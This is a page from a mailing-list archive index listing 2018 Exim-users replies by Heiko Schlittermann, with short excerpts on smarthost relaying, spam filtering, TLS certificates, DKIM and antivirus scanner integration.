2018-05-30 Thread Heiko Schlittermann via Exim-users
Renaud Mertens via Exim-users (Di 29 Mai 2018 11:10:51 CEST): > I'm trying to configure exim4 to relay outgoing mail through office365 > smarthost. > Apparently o365 requires a valid certificate with a known domain in the CN > field, otherwise the amount of mails you can send is limited and you

Re: [exim] Help with dropping spam e-mail.

2018-05-15 Thread Heiko Schlittermann via Exim-users
Hi Mark, Heiko Schlittermann via Exim-users <exim-users@exim.org> (Mo 14 Mai 2018 21:23:46 CEST): > all messages destined to this address. (Ideally this is done > automatically doing inbound recipient verification.) > > A fast (but ugly) solution until you got th

Re: [exim] Help with dropping spam e-mail.

2018-05-14 Thread Heiko Schlittermann via Exim-users
Mark Elkins via Exim-users (Mo 14 Mai 2018 10:23:52 CEST): > > I need help. (pun included) > > Someone is using "ple...@help.co.za" as the source of spam e-mail. The > address does not exist... > delivering 1fI8dS-0008Pd-DC (queue run pid 700) > LOG: MAIN >   **

Re: [exim] using self=send causes 127.0.0.1 Connection refused

2018-05-14 Thread Heiko Schlittermann via Exim-users
Jeroen van Aart via Exim-users (Sa 12 Mai 2018 01:30:05 CEST): > For about a decade I have been using a configuration which routes email > submitted on port 587 to port 24 on localhost, on which exim is listening as > well. It then will be sent out. First, why don't you

Re: [exim] setting up purchased SSL certificates on existing system

2018-04-30 Thread Heiko Schlittermann via Exim-users
Gary Stainburn via Exim-users (Mo 30 Apr 2018 15:58:52 CEST): > I have now purchased (through 123-reg) a SSL certificate and I am trying to > install it on the server. > > However, copious Google searches all seem to be bringing up the same few > articles, most of which

Re: [exim] ACL verb "reject" - An error in the Specification?

2018-04-18 Thread Heiko Schlittermann via Exim-users
Heiko Schlittermann via Exim-users <exim-users@exim.org> (Di 17 Apr 2018 21:07:54 CEST): … > I'll fix it, in case it proves to be wrong. > (Until now I do not know of an ACL verb „reject“) spec updated. Thank you for pointing it out. -- Heiko signature.asc Description: P

Re: [exim] ACL verb "reject" - An error in the Specification?

2018-04-17 Thread Heiko Schlittermann via Exim-users
Mike Brudenell via Exim-users (Di 17 Apr 2018 20:47:32 CEST): > Am I going mad? > > Section 43.36 *Detailed information from merged DNS lists* > > in > the Specification

Re: [exim] Exim 4.91 released

2018-04-16 Thread Heiko Schlittermann via Exim-users
Odhiambo Washington via Exim-users (Mo 16 Apr 2018 11:27:06 CEST): … > gcc -o exim > drtables.o(.text+0xea): In function `init_lookup_list': > : undefined reference to `spf_lookup_module_info' > *** Error code 1 Most likely due to change in the name of the EDITME

Re: [exim] Implementing StartTLS, DMarc and DKim on Exim

2018-04-10 Thread Heiko Schlittermann via Exim-users
Peter Hutchison via Exim-users (Mo 09 Apr 2018 15:24:54 CEST): > Has anyone implemented any of the following on their mail systems? StartTLS, > DMarc and DKim. STARTTLS I'd see as a must nowadays. Problems can arise if you have MUAs connecting to your server and your

Re: [exim] X-Report-Abuse on mail sent from SMTP PHP

2018-04-02 Thread Heiko Schlittermann via Exim-users
Marco via Exim-users (Sa 31 Mär 2018 08:18:00 CEST): > Under transport configuration of Exim I have added the X-Report-Abuse > header.This works if an email is sent from a mail client but not from an PHP > application > remote_smtp: … > vmail_aliases: … > dnslookup: >

Re: [exim] exim filter for incoming mail to be spam

2018-03-26 Thread Heiko Schlittermann via Exim-users
Amjad Qasem via Exim-users (So 25 Mär 2018 16:16:13 CEST): > Dear all, > > I'm try to add Exim filter to make mail as spam , but I don't know > the command or the action to change the Spam static, as below > > if ("$h_from:" contains "x...@gmail.com") >then >

Re: [exim] Avast and invalid response from scanner

2018-03-14 Thread Heiko Schlittermann via Exim-users
Luca Bertoncello via Exim-users (Mi 14 Mär 2018 15:11:04 CET): > I added /defer_ok to solve this problem, but of course the paniclog will > always receive these errors... I'm not sure, if defer_ok is the right way, except you agree with getting messages with zip bombs (in

Re: [exim] Avast and invalid response from scanner

2018-03-14 Thread Heiko Schlittermann via Exim-users
Luca Bertoncello via Exim-users (Mi 14 Mär 2018 11:03:19 CET): > Hi list! > > I see very often this message in exim paniclog: > > malware acl condition: avast /var/run/avast/scan.sock : invalid response > from scanner: 'SCAN >

<    1   2   3   4   5   6   >